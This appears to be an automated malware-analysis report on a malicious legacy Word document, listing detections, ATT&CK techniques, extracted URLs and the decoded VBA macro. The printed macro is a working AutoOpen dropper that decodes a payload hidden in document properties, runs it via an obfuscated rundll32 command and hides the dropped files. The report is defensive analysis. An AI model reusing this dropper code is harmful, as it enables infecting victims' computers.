MALICIOUS
158
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1140 Deobfuscate or Obfuscate Malicious Code
T1566.001 Spearphishing Attachment
The file contains legacy WordBasic macros, specifically an AutoOpen macro, which is a common technique for initial execution in older Office documents. The macro is designed to decode and execute a Base64 encoded payload, indicating a downloader or dropper functionality. The presence of a heap-spray pattern further suggests memory manipulation for exploit execution. While the specific family is not identifiable, the overall behavior points to a malicious document designed to deliver a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6347239-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6347239-0
-
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x41 (A) bytes found
Disassembly
Attempted x86 opcode disassembly00025459 41 inc ecx 0002545A 41 inc ecx 0002545B 41 inc ecx 0002545C 41 inc ecx 0002545D 41 inc ecx 0002545E 41 inc ecx 0002545F 41 inc ecx 00025460 41 inc ecx 00025461 41 inc ecx 00025462 41 inc ecx 00025463 41 inc ecx 00025464 41 inc ecx 00025465 41 inc ecx 00025466 41 inc ecx 00025467 41 inc ecx 00025468 41 inc ecx 00025469 41 inc ecx 0002546A 41 inc ecx 0002546B 41 inc ecx 0002546C 41 inc ecx 0002546D 41 inc ecx 0002546E 41 inc ecx 0002546F 41 inc ecx 00025470 41 inc ecx 00025471 41 inc ecx 00025472 41 inc ecx 00025473 41 inc ecx 00025474 41 inc ecx 00025475 41 inc ecx 00025476 41 inc ecx 00025477 41 inc ecx 00025478 41 inc ecx 00025479 41 inc ecx 0002547A 41 inc ecx 0002547B 41 inc ecx 0002547C 41 inc ecx 0002547D 41 inc ecx 0002547E 41 inc ecx 0002547F 41 inc ecx 00025480 41 inc ecx 00025481 41 inc ecx 00025482 41 inc ecx 00025483 41 inc ecx 00025484 41 inc ecx 00025485 41 inc ecx 00025486 41 inc ecx 00025487 41 inc ecx 00025488 41 inc ecx 00025489 41 inc ecx 0002548A 41 inc ecx 0002548B 41 inc ecx 0002548C 41 inc ecx 0002548D 41 inc ecx 0002548E 41 inc ecx 0002548F 41 inc ecx 00025490 41 inc ecx 00025491 41 inc ecx 00025492 41 inc ecx 00025493 41 inc ecx 00025494 41 inc ecx 00025495 41 inc ecx 00025496 41 inc ecx 00025497 41 inc ecx 00025498 41 inc ecx 00025499 41 inc ecx 0002549A 41 inc ecx 0002549B 41 inc ecx 0002549C 41 inc ecx 0002549D 41 inc ecx 0002549E 41 inc ecx 0002549F 41 inc ecx 000254A0 41 inc ecx 000254A1 41 inc ecx 000254A2 41 inc ecx 000254A3 41 inc ecx 000254A4 41 inc ecx 000254A5 41 inc ecx 000254A6 41 inc ecx 000254A7 41 inc ecx 000254A8 41 inc ecx 000254A9 41 inc ecx 000254AA 41 inc ecx 000254AB 41 inc ecx 000254AC 41 inc ecx 000254AD 41 inc ecx 000254AE 41 inc ecx 000254AF 41 inc ecx 000254B0 41 inc ecx 000254B1 41 inc ecx 000254B2 41 inc ecx 000254B3 41 inc ecx 000254B4 41 inc ecx 000254B5 41 inc ecx 000254B6 41 inc ecx 000254B7 41 inc ecx 000254B8 41 inc ecx
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "NewMacros" Sub AutoOpen() Execute -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
'save decoded file Path = Environ("LOCALAPPDATA") + "\" + "netwf" + ".dat" -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://ccdcoe.org/ In document text (OLE body)
- http://cyber.army.mil/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/t/pg/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/Dimensions#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/Font#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/g/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4429 bytes |
SHA-256: da175d2a4c091734724f52fd0cb76273348d4c24f47149e7e9747d0e04b20625 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Execute
End Sub
Private Function DecodeBase64(base64) As Byte()
Const decodeTable = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
If 0 <> Len(base64) Mod 4 Then
Exit Function
End If
outputLen = (Len(base64) / 4) * 3
If "=" = Mid(base64, Len(base64), 1) Then
outputLen = outputLen - 1
End If
If "=" = Mid(base64, Len(base64) - 1, 1) Then
outputLen = outputLen - 1
End If
Dim decodedBytes() As Byte
ReDim decodedBytes(outputLen - 1)
outputIndex = 0
For quartet = 1 To Len(base64) Step 4
groupBase64Number = 0
Const base = 64
realBytesInThisGroup = 3
For i = 0 To 3
inputChar = Mid(base64, quartet + i, 1)
indexInTable = 0
If "=" = inputChar Then
realBytesInThisGroup = realBytesInThisGroup - 1
Else
indexInTable = InStr(1, decodeTable, inputChar, vbBinaryCompare) - 1
End If
If -1 = indexInTable Then
Exit Function
End If
groupBase64Number = (groupBase64Number * base) + indexInTable
Next
groupBase64Number = Hex(groupBase64Number)
'add leading zeroes, lengt of hex = 6:
groupBase64Number = String(6 - Len(groupBase64Number), "0") & groupBase64Number
'split hex number into 3 groups, 2 hex characters each:
decodedBytes(outputIndex) = CByte("&H" & Mid(groupBase64Number, 1, 2))
outputIndex = outputIndex + 1
If realBytesInThisGroup > 1 Then
decodedBytes(outputIndex) = CByte("&H" & Mid(groupBase64Number, 3, 2))
outputIndex = outputIndex + 1
If realBytesInThisGroup > 2 Then
decodedBytes(outputIndex) = CByte("&H" & Mid(groupBase64Number, 5, 2))
outputIndex = outputIndex + 1
End If
End If
Next
DecodeBase64 = decodedBytes
End Function
Private Sub Execute()
Dim Path As String
Dim FileNum As Long
Dim bin() As Byte
Dim cmdLine As String
Const HIDDEN_WINDOW = 1
strComputer = "."
'extract and decode encoded file
Subject = ActiveDocument.BuiltInDocumentProperties.Item("Subject")
Subject = Right(Subject, Len(Subject) - 50)
Company = ActiveDocument.BuiltInDocumentProperties.Item("Company")
Company = Right(Company, Len(Company) - 50)
Category = ActiveDocument.BuiltInDocumentProperties.Item("Category")
Category = Right(Category, Len(Category) - 50)
Hyperlink_base = ActiveDocument.BuiltInDocumentProperties.Item("Hyperlink base")
Hyperlink_base = Right(Hyperlink_base, Len(Hyperlink_base) - 50)
Comments = ActiveDocument.BuiltInDocumentProperties.Item("Comments")
Comments = Right(Comments, Len(Comments) - 50)
base64 = Subject + Company + Category + Hyperlink_base + Comments
bin = DecodeBase64(base64)
'save decoded file
Path = Environ("LOCALAPPDATA") + "\" + "netwf" + ".dat"
PathPld = Environ("LOCALAPPDATA") + "\" + "netwf" + ".dll"
PathPldBt = Environ("LOCALAPPDATA") + "\" + "netwf" + ".bat"
If Dir(PathPld, vbHidden) <> "" Then
Exit Sub
End If
FileNum = FreeFile
Open Path For Binary Access Write As #FileNum
Put #FileNum, 1, bin
Close #FileNum
cmdLine = "C:\" + "###" + "Win" + "###" + "dow" + "###" + "s\Sy" + "###" + "ste" + "###" + "m32\" + "run" + "###" + "dll" + "32" + "#" + ".exe " + """" + Path + """" + "###" + ",KlpSvc"
WordBasic.[Shell] Replace(cmdLine, "#", "")
If Dir(PathPld) <> "" Then
SetAttr PathPld, vbHidden
End If
If Dir(PathPldBt) <> "" Then
SetAttr PathPldBt, vbHidden
End If
If Dir(Path) <> "" Then
Kill Path
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.